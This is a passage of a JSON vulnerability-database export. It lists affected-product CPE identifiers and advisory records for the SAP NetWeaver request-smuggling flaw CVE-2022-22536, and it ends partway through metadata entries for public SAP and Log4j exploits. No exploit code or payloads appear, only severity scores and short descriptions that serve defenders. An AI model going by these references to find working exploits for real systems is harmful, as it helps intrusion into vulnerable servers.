"cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_data_gateway:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.001\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1f\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:sp2:*:*:*:*:*:*", "cpe:2.3:a:siemens:mendix:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:-:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp8:*:*:*:*:*:*", "cpe:2.3:a:cisco:packaged_contact_center_enterprise:11.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cx_cloud_agent:001.012:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(1\\):es02:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.004\\(000.914\\):-:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_command:4.16.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:intel:secure_device_onboard:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(2.26\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_spaces:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\\(2\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1e\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:head-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:session_management:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.85:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.001.001:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_optimization_engine:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1d\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unity_connection:11.5\\(1.10000.6\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch5:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.17900.52\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(1.26\\):*:*:*:*:*:*:*", "cpe:2.3:a:intel:system_debugger:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:paging_server:14.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.1\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.18900.97\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.001\\(000.518\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:intel:genomics_kernel_library:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\\(4.018\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su2:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:xpedition_package_integrator:-:*:*:*:*:*:*:*", "cpe:2.3:a:intel:sensor_solution_firmware_development_kit:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.8:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:teamcenter:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.65000.14\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_secure_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es01:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.006\\(000.156\\):-:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.000.001:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.5\\(1\\):su1:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:2.4.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:enterprise_chat_and_email:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1b\\):*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.004.000.003:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:xpedition_enterprise:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_3:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1k\\):*:*:*:*:*:*:*", "cpe:2.3:a:intel:audio_development_kit:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_services_orchestrator:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1l\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:data_center_network_manager:11.3\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_insights_for_data_center:6.0\\(2.1914\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:dna_spaces_connector:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.5\\(1\\):su1:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:prime_service_catalog:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(001\\):*:*:*:*:*:*:*", "cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release4:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sentron_powermanager:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.002\\):*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_controller:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:nx:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_zero_touch_provisioning:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_vantage:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.002\\(001\\):*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:intel:oneapi_sample_browser:-:*:*:*:*:eclipse:*:*", "cpe:2.3:a:siemens:solid_edge_cam_pro:*:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_assurance_engine:6.0\\(2.1912\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.0\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_workforce_optimization:11.5\\(1\\):sr7:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_harness_design:2020:sp2002:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\\(1.22900.6\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.2\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\\(3\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5\\(4.66000.14\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1h\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.001\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1\\)su3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_2:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:intel:system_studio:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:11.5\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.22900.28\\):*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_insights:-:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:opcenter_intelligence:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1c\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:sp1912:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.000\\(000.458\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.010\\(000.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.003:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\\(1.21900.40\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.002\\(000.116\\):-:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:percussion:rhythmyx:7.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:operation_scheduler:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp7:*:*:*:*:*:*", "cpe:2.3:a:siemens:logo\\!_soft_comfort:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_computing_system:006.008\\(001.000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:broadworks:-:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es03:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\\(002.000\\):*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch4:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.000\\(000\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:fog_director:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:iot_operations_dashboard:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:12.5\\(2\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\\(1\\):es02:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\\(1a\\):*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.4\\(1\\):*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_viewpoint:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-18T07:32:20", "description": "A remote code execution vulnerability exists in SAP NetWeaver Application Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T00:00:00", "type": "checkpoint_advisories", "title": "SAP NetWeaver Application Server Remote Code Execution (CVE-2022-22536)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22536"], "modified": "2022-02-17T00:00:00", "id": "CPAI-2022-0042", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-10-18T16:35:16", "description": "SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim\u2019s request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T00:00:00", "type": "attackerkb", "title": "CVE-2022-22536", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22536"], "modified": "2023-10-07T00:00:00", "id": "AKB:484D6DEC-EFAF-46E7-ACF1-6CB13F63FC68", "href": "https://attackerkb.com/topics/QF2qeHgdBB/cve-2022-22536", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-04-02T17:34:59", "description": "# SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-02T16:12:56", "type": "githubexploit", "title": "Exploit for HTTP Request Smuggling in Sap Content Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22536"], "modified": "2022-04-02T16:12:56", "id": "92B6BB94-CA85-576F-96D4-94E149EE1FC3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T15:50:11", "description": "* CVE-2022-22536\nSAP memory pipes desynchronization vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T09:22:19", "type": "githubexploit", "title": "Exploit for HTTP Request Smuggling in Sap Netweaver Application Server Abap", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22536"], "modified": "2023-11-24T20:22:28", "id": "75F44E16-D76D-596E-A23F-1F440DA58219", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:49:34", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 